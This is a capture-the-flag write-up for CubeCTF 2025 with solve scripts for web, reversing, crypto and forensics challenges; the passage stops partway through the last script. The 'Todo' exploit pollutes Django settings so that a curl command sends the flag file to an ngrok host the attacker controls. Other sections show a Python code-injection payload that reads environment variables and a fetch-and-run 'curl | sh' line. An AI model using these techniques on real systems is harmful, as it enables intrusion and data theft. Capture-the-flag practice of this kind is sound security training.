CubeCTF 2025

Solutions for 10 questions (out of 13 with at least 1 solve). Also advertisement for https://krauq.ai.

Misc

Is this stego? (165 solves)

Description:

Someone was asking us for a stego challenge, hopefully this is what they were looking for.

Flag format: cube{LAT,LON} with only two digits after the decimal point.

e.g. cube{12.34,-56.78}

Author: @rdj & @ski

Resources:

Attachment

Solution:

Google search by image finds many images with the location, all the results are instagram though. A trick for these OSINT is to resize the search section to get more results.

Eventually it can be narrowed down by a few things like Chile, cable cars, etc., many ways to find.

On release, flag was cube{-33.41,-70.61} but I think they fixed it to also accept cube{-33.41,-70.62}.

Fairly Basic Programming Assignment (105 solves)

Description:

We wanted the intern to learn how to code... but we're not quite sure what he did here. Can you make any sense of what it does?

Note: the flag format for this challenge is USCGCTF{EX4MPLE_FL4G}

Authors: @samwise and @arcticx

Resources:

Attachment

Solution:

Paste in to krauq.ai for one-shot solve. Needed to ask a few times though

Web

Legal Snacks (281 solves)

Description:

We got hungry writing this challenge...

http://legalsnacks.chal.cubectf.com:5000

Author: @outwrest

Resources:

Attachment

Solution:

This is the freebie of the competition, worth only 100 points. The below script generated by AI solves it.

#!/usr/bin/env python3

import requests, re, random, string, sys, argparse, itertools, html

# ---------------------------------------------------------------------------
BASE = "http://legalsnacks.chal.cubectf.com:5000"
MAX_CONSECUTIVE_404 = 5        # stop scanning products after this many 404s
USER_AGENT = "Mozilla/5.0"

# ---------------------------------------------------------------------------
def randstring(n=6):
    return "".join(random.choices(string.ascii_lowercase, k=n))

def login_or_register(sess: requests.Session, base: str) -> None:
    u, p = f"pwn_{randstring()}", "p4ssw0rd"
    r = sess.post(f"{base}/register",
                  data={"username": u, "password": p},
                  headers={"User-Agent": USER_AGENT},
                  allow_redirects=False)

    if r.status_code == 302:          # name exists → login
        sess.post(f"{base}/login",
                  data={"username": u, "password": p},
                  headers={"User-Agent": USER_AGENT})

def scan_products(sess: requests.Session, base: str, limit: int = 50):
    misses = 0
    for pid in range(1, limit + 1):
        r = sess.get(f"{base}/products/{pid}",
                     headers={"User-Agent": USER_AGENT},
                     allow_redirects=False)
        if r.status_code != 200:
            misses += 1
            if misses >= MAX_CONSECUTIVE_404:
                break
            continue
        misses = 0

        page = r.text
        # Name: first <h1> or <h5> text
        m_name = re.search(r'<h[15][^>]*>([^<]+)</h[15]>', page, re.I)
        if not m_name:
            continue
        name = html.unescape(m_name.group(1)).strip()

        # Price: first $x.xx on the page
        m_price = re.search(r'\$([0-9]+\.[0-9]+)', page)
        price = float(m_price.group(1)) if m_price else None

        yield (pid, name, price)

def add_to_cart(sess, base, pid, qty):
    sess.post(f"{base}/cart/add",
              data={"product_id": pid, "quantity": qty},
              headers={"User-Agent": USER_AGENT})

def main(base: str = BASE):
    s = requests.Session()

    # 1) account
    login_or_register(s, base)

    # 2) discover products
    products = list(scan_products(s, base))
    if not products:
        sys.exit("✘ no products found – server layout may have changed")

    elite = next((p for p in products if p[1].lower() == "elite hacker snack"),
                 None)
    if not elite:
        sys.exit("✘ “Elite Hacker Snack” not found in the first scan range")

    cheap = min((p for p in products if p[0] != elite[0]),
                key=lambda x: x[2] or 999)

    print(f"[+] Elite Hacker Snack  id={elite[0]}")
    print(f"[+] Cheapest filler     id={cheap[0]}  price=${cheap[2]:.2f}")

    # 3) craft cart
    add_to_cart(s, base, elite[0], 0)   # quantity 0!
    add_to_cart(s, base, cheap[0], 1)

    # 4) checkout (follow redirect → receipt)
    receipt = s.post(f"{base}/checkout",
                     headers={"User-Agent": USER_AGENT},
                     allow_redirects=True).text

    m_flag = re.search(r'cube\{[^}]+\}', receipt)
    if m_flag:
        print("\nFLAG:", m_flag.group(0))
    else:
        open("receipt.html", "w").write(receipt)
        sys.exit("✘ flag not found – receipt saved to receipt.html")

# ---------------------------------------------------------------------------
if __name__ == "__main__":
    parser = argparse.ArgumentParser(description="Legal Snacks solver")
    parser.add_argument("--url", default=BASE, help="Base URL of challenge")
    args = parser.parse_args()
    main(args.url)

# Output:
#[+] Elite Hacker Snack  id=6
#[+] Cheapest filler     id=5  price=$3.14
#FLAG: cube{happy birthday!:flag_us::flag_us::flag_us::flag_us::flag_us:_c65ece2a}

Todo (55 solves)

Description:

I'm sure at some point we'll get around to finishing this one...

http://todo.chal.cubectf.com:1337

Authors: @quasar098, @jakesss_ and @downgrade

Resources:

Attachment

Solution:

I don't specialize in web so here's a writeup assisted by AI.

This challenge involves chaining two vulnerabilities:

Django-Unicorn class pollution vulnerability (CVE-2025-24370)
Command injection in the application's home route

The exploitation requires polluting Python runtime settings to redirect a curl command that leaks the flag.

File Structure

After extracting the provided zip file, we find:

chal/
├── Dockerfile
├── db.sqlite3
├── docker-compose.yaml
├── flag.txt
├── manage.py
└── myproject/
    ├── __init__.py
    ├── asgi.py
    ├── components/
    │   └── todo.py
    ├── settings.py
    ├── templates/
    │   ├── index.html
    │   └── unicorn/
    │       └── todo.html
    ├── urls.py
    └── wsgi.py

Key Findings from Dockerfile

FROM python:3
WORKDIR /usr/src/app
RUN pip install django django-unicorn==0.60.0
COPY . .
COPY flag.txt /tmp/flag.txt
CMD ["./manage.py", "runserver", "0.0.0.0:1337", "--pythonpath=.", "--settings=myproject.settings", "--insecure"]

Important observations:

Uses django-unicorn==0.60.0 (vulnerable version)
Flag is copied to /tmp/flag.txt
Application runs on port 1337

1. Command Injection Vulnerability

In myproject/urls.py:

from django.conf import settings
from os import system

def home(request):
    # todo charge users $49.99/month because greed
    # todo dont send the confidential flag ...
    system(f'curl {settings.CONTACT_URL} -d @/tmp/flag.txt -X GET -o /dev/null')
    return render(request, f'index.html')

The home() function executes a system command with settings.CONTACT_URL interpolated directly into the command string. This runs every time someone visits the homepage.

2. Django-Unicorn Class Pollution (CVE-2025-24370)

Research reveals that Django-Unicorn 0.60.0 is vulnerable to CVE-2025-24370:

CVSS Score: 9.3 (Critical)
Type: Python class pollution
Impact: Allows remote modification of Python runtime objects
Fixed in: Version 0.62.0

The vulnerability exists in the set_property_value function, which can be exploited by crafting requests with special property paths like __init__.__globals__.

Django-Unicorn Component

The todo component (myproject/components/todo.py):

from django_unicorn.components import UnicornView
from django import forms

class TodoForm(forms.Form):
    task = forms.CharField(min_length=2, max_length=20, required=True)

class TodoView(UnicornView):
    form_class = TodoForm
    task = ""
    tasks = []
    
    def add(self):
        if self.is_valid():
            self.tasks.append(self.task)
            self.task = ""

Frontend Integration

The application uses Django-Unicorn's reactive components to handle the todo list functionality. When visiting the homepage, we can see the Unicorn component data in the HTML:

<div unicorn:id="BhpiJNDD" unicorn:name="todo" unicorn:checksum="UCCXit7t" unicorn:data='{"task":"","tasks":[]}'>

The attack chain:

Use Django-Unicorn's class pollution to modify settings.CONTACT_URL
Change it from the default https://example.com to our controlled server
Trigger the command injection by visiting the homepage
Receive the flag content via the curl command

1. Create a Webhook Listener

Using ngrok to create a public endpoint:

ngrok http 8888

This provides a URL like: https://5f9b-185-245-87-188.ngrok-free.app

2. Create the Exploit Script

import requests
import json
import re

# Get initial page to extract tokens
session = requests.Session()
resp = session.get("http://todo.chal.cubectf.com:1337")
html = resp.text

# Extract unicorn component data
unicorn_id = re.search(r'unicorn:id="([^"]+)"', html).group(1)
checksum = re.search(r'unicorn:checksum="([^"]+)"', html).group(1)
hash_val = re.search(r'"hash":"([^"]+)"', html).group(1)
csrf_token = session.cookies.get('csrftoken')

print(f"ID: {unicorn_id}")
print(f"Checksum: {checksum}")
print(f"Hash: {hash_val}")
print(f"CSRF: {csrf_token}")

# Craft payload to exploit class pollution
payload = {
    "id": unicorn_id,
    "data": {
        "task": "",
        "tasks": []
    },
    "checksum": checksum,
    "actionQueue": [
        {
            "type": "syncInput",
            "payload": {
                "name": "task",
                "value": "test"
            }
        },
        {
            "type": "syncInput",
            "payload": {
                "name": "__init__.__globals__.sys.modules.django.conf.settings.CONTACT_URL",
                "value": "https://5f9b-185-245-87-188.ngrok-free.app"
            }
        }
    ],
    "hash": hash_val,
    "epoch": 1736000000000
}

headers = {
    "Content-Type": "application/json",
    "X-CSRFTOKEN": csrf_token,
    "X-Requested-With": "XMLHttpRequest"
}

# Send the class pollution payload
print("\nSending class pollution payload...")
resp = session.post(
    "http://todo.chal.cubectf.com:1337/unicorn/message/todo",
    json=payload,
    headers=headers
)

print(f"Response: {resp.status_code}")
if resp.text:
    print(f"Body: {resp.text[:500]}...")

# Trigger the command injection
print("\nTriggering command injection by visiting home page...")
resp2 = session.get("http://todo.chal.cubectf.com:1337")
print(f"Home page response: {resp2.status_code}")

print("\nThe flag should have been sent to ngrok!")
print("Check your ngrok web interface at http://localhost:4040")

Run the exploit:

python3 exploit.py

Expected output:

ID: BhpiJNDD
Checksum: UCCXit7t
Hash: QjijJWai
CSRF: c3HHihUcXvCuAQV2lbBA1hPhot0w9463

Sending class pollution payload...
Response: 200
Body: {"id":"BhpiJNDD","data":{"task":"test"},"errors":{},"calls":[],...

Triggering command injection by visiting home page...
Home page response: 200

The flag should have been sent to ngrok!
Check your ngrok web interface at http://localhost:4040

The flag will appear in your ngrok interface as a GET request with the flag content in the body. The executed command is:

curl https://[your-ngrok-url] -d @/tmp/flag.txt -X GET -o /dev/null

Race Condition

The pollution affects the global Python runtime
Only one person can receive the flag at a time
The last person to pollute settings.CONTACT_URL will receive all subsequent flags
The pollution persists until the server restarts

Why the Flag Keeps Coming

Once polluted, every visit to the homepage triggers the command injection, including:

Other players visiting the site
Health checks or monitoring
Search engine crawlers

Django-Unicorn Request Flow

The frontend sends AJAX requests to /unicorn/message/todo
The actionQueue contains syncInput actions that update component properties
The vulnerability allows property paths to escape the component scope

Class Pollution Path

The magic happens with this path:

__init__.__globals__.sys.modules.django.conf.settings.CONTACT_URL

Breaking it down:

__init__: Access the component's initializer
__globals__: Access the global namespace
sys.modules: Python's module cache
django.conf.settings: Django's settings object
CONTACT_URL: The specific setting we want to modify

To prevent this vulnerability:

Update Django-Unicorn to version 0.62.0 or later
Never interpolate user-controllable data into system commands
Use subprocess with proper argument lists instead of system()
Implement input validation for all user inputs

Rev

Gnisrever (30 solves)

Description:

Normally you get a binary and have to reverse engineer it. That sounds like a lot of work. Instead, this time you give us a binary and we do the reversing for you.

nc gnisrever.chal.cubectf.com 5000

Author: @B00TK1D

Resources:

Attachment

Solution:

First, here's how the solution looks like:

nc gnisrever.chal.cubectf.com 5000
proof of work:
curl -sSfL https://pwn.red/pow | sh -s s.AAAD6A==.uf3boRhM7jqZolsSm6/LDw==
solution: s.e9FwJvsSYOkxsXMbQgca3GIwUpa1nP85sIYZrwlHo1l/UupvgAS0ko9hlg6pnrhkLcg52jyrGbQsk0okWcjLjyMDp6/SkdtuqwV/2hmuTr6QLa294MDfL4d3LV+Lf0hCASILbo6DAsIo/kOf/cJXZTjnkmxpbhWykC0jw2VUsyszpG6QJ7fwFBhGIgynW9PR2r1NiKBtQlbnIWsXoMMGkA==
Please enter the assembly code (up to 100 lines). End with an empty line:
db 0x23,0x21,0x2f,0x62,0x69,0x6e,0x2f,0x73,0x68,0x0a
db 0x70,0x72,0x69,0x6e,0x74,0x65,0x6e,0x76,0x20,0x23,0x0a
db 0x23,0x20,0x76,0x6e,0x65,0x74,0x6e,0x69,0x72,0x70,0x0a
db 0x68,0x73,0x2f,0x6e,0x69,0x62,0x2f,0x21,0x23,0x0a

./forward.bin: line 4: hs/nib/!#: not found
./reversed.bin: line 4: hs/nib/!#: not found
SHLVL=2 OLDPWD=/app PWD=/tmp FLAG="cube{d1d_yo0_d0_1t_th3_h4rd_w4y_0r_th3_34sy_w4y_38d50a54}"
Done!

So after solving the PoW, the challenge only allows you to submit flat binaries of up to 100 lines whose bytes, when reversed line-wise and then having their line order reversed (rev | tac), remain exactly the same, and which print the flag on stdout. The trick is to write a tiny shell-script in raw bytes that runs printenv (dumping the entire environment, including the flag) and mirror each line so the reversal yields the identical script. Below is how the script was created.

#!/bin/sh
printenv #
# vnetnirp
hs/nib/!#

# for line in ["#!/bin/sh\n", "printenv #\n", "# vnetnirp\n", "hs/nib/!#\n"]:
#    print("db " + ", ".join(f"0x{b:02x}" for b in line.encode()))

Numba One (13 solves)

Description:

Snake lang best lang.

Flag format is cube{[0-9a-z_]+}

Authors: @flocto and @oh_word

Resources:

Attachment

Solution:

Initially I had a solve script that decrypts in pairs but it would have taken at least like 10 hours to finish decrypting even after optimization. I was tempted to just leave it running overnight. Handles interruptions and can resume progress. Here's the script for reference.

#!/usr/bin/env python3
import numpy as np
import sys
import os
from pathlib import Path
import re
import time

# Import the encrypt module
sys.setdlopenflags(os.RTLD_LAZY | os.RTLD_GLOBAL)
import importlib.machinery
import importlib.util

ldr = importlib.machinery.ExtensionFileLoader(
    "encrypt_module", "encrypt_module.cpython-313-x86_64-linux-gnu.so")
spec = importlib.util.spec_from_loader(ldr.name, ldr)
encrypt_module = importlib.util.module_from_spec(spec)
ldr.exec_module(encrypt_module)

# Read ciphertext
data = Path("flag.enc").read_bytes()
ciphertext = data[32:]  # Skip SHA256
print(f"Ciphertext: {len(ciphertext)} bytes = {len(ciphertext)//2} pairs")

# Start fresh or continue from existing
output_file = Path("decrypting.png")
if output_file.exists():
    plaintext = bytearray(output_file.read_bytes())
    start_pos = len(plaintext)
    print(f"Resuming from {start_pos} bytes")
else:
    plaintext = bytearray()
    start_pos = 0
    print("Starting fresh")

# Decrypt pair by pair
pairs_done = start_pos // 2
total_pairs = len(ciphertext) // 2

print(f"\nDecrypting from pair {pairs_done}/{total_pairs}")
print("Press Ctrl+C to stop\n")

last_save_time = time.time()

try:
    for pair_idx in range(pairs_done, total_pairs):
        pos = pair_idx * 2
        ct_pair = ciphertext[pos:pos+2]

        # Brute force the pair
        found = False
        for b1 in range(256):
            for b2 in range(256):
                # Test: existing_plaintext + candidate_pair
                test = plaintext + bytes([b1, b2])
                enc = encrypt_module.encrypt(np.frombuffer(test, dtype=np.uint8))

                # Check if last 2 bytes match our target
                if bytes(enc[-2:]) == ct_pair:
                    # Found it!
                    plaintext.extend([b1, b2])
                    found = True

                    # Show progress every 10 pairs
                    if pair_idx % 10 == 0:
                        elapsed = time.time() - last_save_time
                        rate = 10 / elapsed if elapsed > 0 else 0
                        eta = (total_pairs - pair_idx) / rate / 60 if rate > 0 else 999

                        last_32 = plaintext[-32:] if len(plaintext) >= 32 else plaintext
                        text = ''.join(chr(b) if 32 <= b <= 126 else '.' for b in last_32)

                        print(f"Pair {pair_idx:5d}/{total_pairs} ({pair_idx*100//total_pairs:3d}%) "
                              f"[{rate:.1f} pairs/s, ETA: {eta:.1f} min] "
                              f"...{text}")

                        # Save progress
                        output_file.write_bytes(plaintext)
                        last_save_time = time.time()

                        # Check for flag
                        if b'cube{' in plaintext:
                            match = re.search(rb'cube\{[0-9a-z_]+\}', plaintext)
                            if match:
                                print(f"\n*** FLAG FOUND: {match.group().decode()} ***\n")
                                output_file.write_bytes(plaintext)
                                exit(0)

                    break

            if found:
                break

        if not found:
            print(f"\nFailed to decrypt pair at position {pos}")
            break

except KeyboardInterrupt:
    print("\n\nStopped by user")
    output_file.write_bytes(plaintext)
    print(f"Saved {len(plaintext)} bytes to {output_file}")

    # Quick analysis
    if len(plaintext) > 100:
        print(f"\nFirst 64 bytes: {plaintext[:64]}")
        if b'TROLLED!' in plaintext[:20]:
            print("✓ Contains TROLLED! prefix")
        if b'IHDR' in plaintext[:50]:
            print("✓ Contains PNG IHDR chunk")
        if b'tEXt' in plaintext:
            pos = plaintext.find(b'tEXt')
            print(f"✓ Contains tEXt chunk at position {pos}")
            print(f"  Context: {plaintext[pos-4:pos+50]}")

# Final save
output_file.write_bytes(plaintext)
print(f"\nDecrypted {len(plaintext)} bytes total")

python solve_with_progress.py 
Ciphertext: 121224 bytes = 60612 pairs
Resuming from 1582 bytes

Decrypting from pair 791/60612
Press Ctrl+C to stop

Pair   800/60612 (  1%) [1.8 pairs/s, ETA: 552.2 min] .....$+U'%.S.n..}...G..;_q.z&......
Pair   810/60612 (  1%) [1.6 pairs/s, ETA: 614.2 min] ...;_q.z&........#>.]L..8.C.-..gR..
Pair   820/60612 (  1%) [1.4 pairs/s, ETA: 715.8 min] ....8.C.-..gR...........e..U:.e...m
^C

Stopped by user
Saved 1660 bytes to decrypting.png

First 64 bytes: bytearray(b'TROLLED!\x00\x00\x00\rIHDR\x00\x00\x01\xc7\x00\x00\x02j\x08\x02\x00\x00\x00\xd1\xf4\x1cH\x00\x00\x00\x01sRGB\x00\xae\xce\x1c\xe9\x00\x00\x00\x04gAMA\x00\x00\xb1\x8f\x0b\xfca\x05\x00\x00')
✓ Contains TROLLED! prefix
✓ Contains PNG IHDR chunk

Decrypted 1660 bytes total

Here's the actual solve script after reversing the logic (decompiled the .so and a lot of AI analysis). Solves instantly. Need to run with python 3.13.

#!/usr/bin/env python3
from pathlib import Path
import sys

import importlib.machinery
import importlib.util
import numpy as np


def load_encrypt_module(so_path: str = "encrypt_module.cpython-313-x86_64-linux-gnu.so"):
    """Dynamically load the challenge’s shared object."""
    loader = importlib.machinery.ExtensionFileLoader("encrypt_module", so_path)
    spec = importlib.util.spec_from_loader(loader.name, loader)
    module = importlib.util.module_from_spec(spec)
    loader.exec_module(module)
    return module


def main():
    # ------------------------------------------------------------------ args
    in_file = Path(sys.argv[1]) if len(sys.argv) > 1 else Path("flag.enc")
    out_file = Path(sys.argv[2]) if len(sys.argv) > 2 else Path("decrypted.bin")

    if not in_file.is_file():
        sys.exit(f"[!] Cipher file not found: {in_file}")

    encrypt_mod = load_encrypt_module()

    # ------------------------------------------------------- read ciphertext
    blob = in_file.read_bytes()
    cipher = blob[32:]                     # skip the prepended SHA-256 hash

    # ------------------------------------------------------ craft dummy buf
    # make_key() uses plaintext[0] and plaintext[1] as a 16-bit seed
    dummy = bytearray(len(cipher))
    dummy[0] = 0x54                        # 'T'
    dummy[1] = 0x52                        # 'R'

    # ask encrypt() for the keystream
    ks = bytearray(
        encrypt_mod.encrypt(np.frombuffer(dummy, dtype=np.uint8)).tobytes()
    )

    # remove the two bytes we forced in
    ks[0] ^= 0x54
    ks[1] ^= 0x52

    # ----------------------------------------------------------- decrypt
    plain = bytes(c ^ k for c, k in zip(cipher, ks))
    out_file.write_bytes(plain)

    print(f"[+] Wrote {len(plain)} bytes to {out_file}")
    print("[+] First 16 bytes:", plain[:16])


if name == "main":
    main()

Then manually fix the PNG header (many ways to do such as adding it back in a hex editor).

Crypto

Incantation (52 solves)

Description:

While walking through a meadow, you find a magical book on the ground. The letters seem to be dancing off the page, dancing to a rhythm of a song you used to know, but you can't quite make them out.

nc incantation.chal.cubectf.com 5757

Author: @B00TK1D

Resources:

Attachment

Solution:

I think it's just correct letters show up more often than not or something? Solve script below.

#!/usr/bin/env python3

import socket, collections, sys

HOST = "incantation.chal.cubectf.com"
PORT = 5757

ALPHABET      = " _abcdefghijklmnopqrstuvwxyz0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ{}"
ALPHA_LEN     = len(ALPHABET)          # 66 symbols

# ── tune here ───────────────────────────────────────────────────────────────
FRAME_LOG_EVERY  = 1       # 1 = log every frame (raise to 10/50 if it’s too noisy)
PROGRESS_EVERY   = 25      # print a guess this often
MIN_FRAMES       = 2_000   # stop after this many once the guess is stable
THRESHOLD_FACTOR = 1.6     # ≥ 1.6 × baseline ⇒ assume that char is the flag char
# ────────────────────────────────────────────────────────────────────────────

def most_likely(counters, frames):
    """Return current best-guess flag string."""
    expected = frames / ALPHA_LEN
    return "".join(
        (ctr.most_common(1)[0][0] if ctr.most_common(1)[0][1] / expected >= THRESHOLD_FACTOR
         else "?")
        for ctr in counters
    )

def main():
    print(f"[*] connecting to {HOST}:{PORT} …", file=sys.stderr)
    s = socket.create_connection((HOST, PORT))

    counters, frames, flen = None, 0, None
    buf = b""

    try:
        while True:
            buf += s.recv(4096)
            while buf and (b"\n" in buf or b"\r" in buf):
                # split at first newline or carriage-return
                idx_n = buf.find(b"\n")
                idx_r = buf.find(b"\r")
                sep = min([x for x in (idx_n, idx_r) if x != -1])
                line, buf = buf[:sep], buf[sep + 1:]

                if not line:
                    continue                    # ignore empty lines

                if flen is None:                 # first frame → know flag length
                    flen = len(line)
                    counters = [collections.Counter() for _ in range(flen)]
                    print(f"[*] detected flag length: {flen}", file=sys.stderr)

                if len(line) != flen:            # corrupted frame
                    print(f"[!] skipped weird frame of length {len(line)}", file=sys.stderr)
                    continue

                for i, b in enumerate(line):
                    counters[i][chr(b)] += 1
                frames += 1

                if frames % FRAME_LOG_EVERY == 0:
                    print(f"frame {frames:>6}: {line.decode(errors='replace')}")

                if frames % PROGRESS_EVERY == 0:
                    print(f"progress {frames:>6}: {most_likely(counters, frames)}")

                if frames >= MIN_FRAMES and "?" not in most_likely(counters, frames):
                    raise KeyboardInterrupt

    except KeyboardInterrupt:
        print("\n[✓] flag recovered after", frames, "frames:")
        print(most_likely(counters, frames))


if __name__ == "__main__":
    main()

[*] connecting to incantation.chal.cubectf.com:5757 …
[*] detected flag length: 40
frame      1: rFYDEXnG43mGayf069SfClC_R4lOWO4jz0MbvfJP
frame      2: 3V24r9UPgLUIW2JLYU5SE}mbzMeLKP6mH{G{78ME
frame      3: pCsjd}U_UxS6wQAMAG3r2}5hYhd1HPbZ0we3v}2n
...
frame   2838: {83q_v2QvA7A_ZHliazkiQEHgTLL_gu{FOmGhG22
frame   2839: nZbmVHzbJOoUAS7IJp0JvKH_6VGD8eeLceXZMu{1
frame   2840: ekrGaRxMcN3z3g04}cD5jHolMji63eX9rnotcBdg

[✓] flag recovered after 2840 frames:
cube{4br4c4d4br4_sh3z4m_pr3st0_98f814ff}

Elementary (31 solves)

Description:

I made a calculator for elementary students. I made sure it can only do basic operations, so it should be safe.

nc elementary.chal.cubectf.com 3456

Author: @B00TK1D

Resources:

Attachment

Solution:

Solve script below.

#!/usr/bin/env python3
"""
    • parallel birthday attack → 48-bit hash collision in 2-8 s
    • payload digs the flag from any env var that contains 'cube{'
    • prints the flag
"""

import os, random, time, multiprocessing as mp, socket, sys

HOST, PORT   = "elementary.chal.cubectf.com", 3456
PAYLOAD_HEAD = "next(v for v in __import__('os').environ.values() if 'cube{' in v)"
MASK         = (1 << 48) - 1
DIGITS       = "0123456789"
REPORT_EVERY = 0.5          # seconds

# ─── exact challenge hash (MSB 48 bits) ──────────────────────────────────────
def _h_py(s: str) -> int:
    b = s.encode()
    h1, h2 = 0x1234567890ab, 0xfedcba098765
    for i, byte in enumerate(b):
        sh = (i % 6) * 6
        if i & 1:
            h2 ^= byte << sh
            h2 = (h2 * 0xc6a4a7935bd1) & 0xFFFFFFFFFFFF
        else:
            h1 ^= byte << sh
            h1 = (h1 * 0x100000001b3) & 0xFFFFFFFFFFFF
    r = h1 ^ ((h2 << 24) | (h2 >> 24))
    for c in (0xff51afd7ed55, 0xc4ceb9fe1a85):
        r = (r ^ (r >> 25)) * c & 0xFFFFFFFFFFFFFFFF
    r ^= r >> 25
    return (r >> 16) & MASK

try:                           # optional Numba turbo-button
    from numba import njit, uint64, uint8
    @njit(uint64(uint8[:]))
    def _h_nb(b):
        h1, h2 = 0x1234567890ab, 0xfedcba098765
        for i in range(b.size):
            byte = b[i]
            sh = (i % 6) * 6
            if i & 1:
                h2 ^= byte << sh
                h2 = (h2 * 0xc6a4a7935bd1) & 0xFFFFFFFFFFFF
            else:
                h1 ^= byte << sh
                h1 = (h1 * 0x100000001b3) & 0xFFFFFFFFFFFF
        r = h1 ^ ((h2 << 24) | (h2 >> 24))
        for c in (0xff51afd7ed55, 0xc4ceb9fe1a85):
            r = (r ^ (r >> 25)) * c & 0xFFFFFFFFFFFFFFFF
        r ^= r >> 25
        return (r >> 16) & MASK
    def H(s: str) -> int:
        return _h_nb(bytearray(s, "ascii"))
except Exception:
    H = _h_py

# ─── parallel collision search ───────────────────────────────────────────────
def worker(seed, q):
    rnd  = random.Random(seed)
    left = {}
    while True:
        good = rnd.choice(DIGITS[1:]) + ''.join(rnd.choice(DIGITS) for _ in range(11))
        hv   = H(good)
        left.setdefault(hv, good)

        evil = f"{PAYLOAD_HEAD}##{os.urandom(3).hex()}"
        hv2  = H(evil)
        if hv2 in left:
            q.put((left[hv2], evil))
            return

def find_collision():
    q = mp.Queue()
    procs = [mp.Process(target=worker, args=(i, q), daemon=True)
             for i in range(mp.cpu_count())]
    for p in procs: p.start()

    start = last = time.time()
    while q.empty():
        if time.time() - last >= REPORT_EVERY:
            print("\r[+] searching …", end="", flush=True)
            last = time.time()
        time.sleep(0.05)

    good, evil = q.get()
    for p in procs: p.terminate()
    print(f"\n[✓] collision in {time.time()-start:.2f} s")
    return good, evil

# ─── minimal network helper (pwntools optional) ──────────────────────────────
def get_flag(good, evil):
    try:
        from pwn import remote
        io = remote(HOST, PORT)
        io.sendlineafter(b"calculate:", good.encode())
        io.sendlineafter(b"calculate:", evil.encode())
        flag = io.recvline(timeout=3).decode(errors="ignore").strip()
        io.close()
        return flag
    except ImportError:
        s = socket.create_connection((HOST, PORT))
        def r_until(marker=b"calculate:"):
            buf = b""
            while marker not in buf:
                buf += s.recv(4096)
        r_until(); s.sendall(good.encode()+b"\n")
        r_until(); s.sendall(evil.encode()+b"\n")
        flag = s.recv(4096).decode(errors="ignore").strip()
        s.close()
        return flag

# ─── main ────────────────────────────────────────────────────────────────────
if __name__ == "__main__":
    random.seed()
    good, evil = find_collision()
    print("GOOD :", good)
    print("EVIL :", evil)
    print("\n[→] retrieving flag …")
    print("Flag:", get_flag(good, evil))

Forensics

Operator (113 solves)

Description:

I think someone has been hiding secrets on my server. Can you find them?

Author: @B00TK1D

Resources:

Attachment

Solution:

Stage

What was in the capture

What I did

1 – Recon

Port-2025 traffic (≈17 KB) delivering a file called xcat with nc -lvp 2025 > /tmp/xcat.

Re-assembled the TCP stream and saved the ELF.

2 – Binary review

xcat is a tiny net-cat look-alike. Symbols (run_server, run_client, chat, xor_encrypt) and a 16-byte key at .data:0x4010.

Found the XOR key: 04 07 17 76 42 69 b0 0b de 18 23 22 1e ed f7 ae.

3 – Second stage traffic

Another stream between 5.161.100.25:2025 ↔ 5.161.95.137:53930 (244 B).

De-segmented the stream, then XOR-decrypted each packet with the key, resetting at each packet (matching how chat() calls xor_encrypt()).

4 – Result

Clear-text dialogue containing the flag.

Extracted the flag string above.

#!/usr/bin/env python3
import sys
import struct
import re

# 1) The 16-byte XOR key from the xcat binary
KEY = bytes.fromhex('040717764269b00bde1823221eedf7ae')

FLAG_RE = re.compile(rb'cube\{[^\}]+\}')

def parse_pcap(path):
    """Yield raw frame bytes from a pcap file (assumes classic pcap, linktype Ethernet)."""
    with open(path, 'rb') as f:
        global_header = f.read(24)
        if len(global_header) < 24:
            raise ValueError("Not a valid PCAP (too short).")
        # You could check magic number here if you like...

        while True:
            hdr = f.read(16)
            if len(hdr) < 16:
                break
            # PCAP record header: ts_sec, ts_usec, incl_len, orig_len (all uint32 LE)
            _, _, incl_len, _ = struct.unpack('<IIII', hdr)
            data = f.read(incl_len)
            if len(data) < incl_len:
                break
            yield data

def extract_tcp_payloads(frames, watch_port=2025):
    """Group TCP payloads by session for packets touching watch_port."""
    sessions = {}
    for eth in frames:
        # Ethernet: bytes 12–13 = Ethertype
        if len(eth) < 14:
            continue
        ethertype = struct.unpack('!H', eth[12:14])[0]
        if ethertype != 0x0800:
            continue
        ip = eth[14:]
        if len(ip) < 20:
            continue
        ver_ihl = ip[0]
        ihl = (ver_ihl & 0x0F) * 4
        proto = ip[9]
        if proto != 6 or len(ip) < ihl + 20:
            continue
        src_ip = '.'.join(str(b) for b in ip[12:16])
        dst_ip = '.'.join(str(b) for b in ip[16:20])
        tcp = ip[ihl:]
        if len(tcp) < 20:
            continue
        src_port, dst_port = struct.unpack('!HH', tcp[:4])
        data_offset = (tcp[12] >> 4) * 4
        payload = tcp[data_offset:]
        if not payload:
            continue

        if src_port == watch_port or dst_port == watch_port:
            ep1 = (src_ip, src_port)
            ep2 = (dst_ip, dst_port)
            key = tuple(sorted([ep1, ep2]))
            sessions.setdefault(key, []).append(payload)

    return sessions

def xor_decrypt(chunks, key):
    out = bytearray()
    for chunk in chunks:
        for i, b in enumerate(chunk):
            out.append(b ^ key[i % len(key)])
    return bytes(out)

def find_flag_in_pcap(pcap_path):
    frames = list(parse_pcap(pcap_path))
    sessions = extract_tcp_payloads(frames, watch_port=2025)

    for sess_key, chunks in sessions.items():
        total = sum(len(c) for c in chunks)
        # skip the big xcat-transfer (~17 KB), focus on smaller (~200 B)
        if total > 10_000:
            continue

        data = xor_decrypt(chunks, KEY)
        m = FLAG_RE.search(data)
        if m:
            return m.group(0).decode()

    return None

if __name__ == "__main__":
    if len(sys.argv) != 2:
        print("Usage: solve.py operator.pcap")
        sys.exit(1)

    flag = find_flag_in_pcap(sys.argv[1])
    if flag:
        print("Flag:", flag)
    else:
        print("No flag found. Are you pointing at the right pcap?")

python operator.py ./operator.pcap 
Flag: cube{c00l_0p3r4t0rs_us3_mult1_st4g3_p4yl04ds_8ab49338}

Discord (64 solves)

Description:

I got a really awesome picture from my friend on Discord, but then he deleted it! I asked someone for a program that could get those pictures back, but when I ran it, all it did was close Discord! Send help, I need that picture back!

NOTE: The flag format for this challenge is uscg{.*}.

Authors: @poke_player and @ajmeese7

Resources:

Download the disk image here: link

Solution:

Tired of writeups now and authors released writeup for everything so here it is quick and simple. First extract with FTK Imager, find the encrypt binary in downloads, unpack with pyinstxtractor, decode pyc (can use pylingual or krauq.io), then build solve script.

#!/usr/bin/env python3
"""
decrypt_discord_cache_cbc.py
---------------------------------
Undo the encrypt.exe variant you de-compiled:

    key = PBKDF2(user_id,
                salt = b'B' * 16,
                dkLen = 32,
                count = 1_000_000,
                hmac_hash_module = SHA-1)   # ← default
    iv  = b'B' * 16
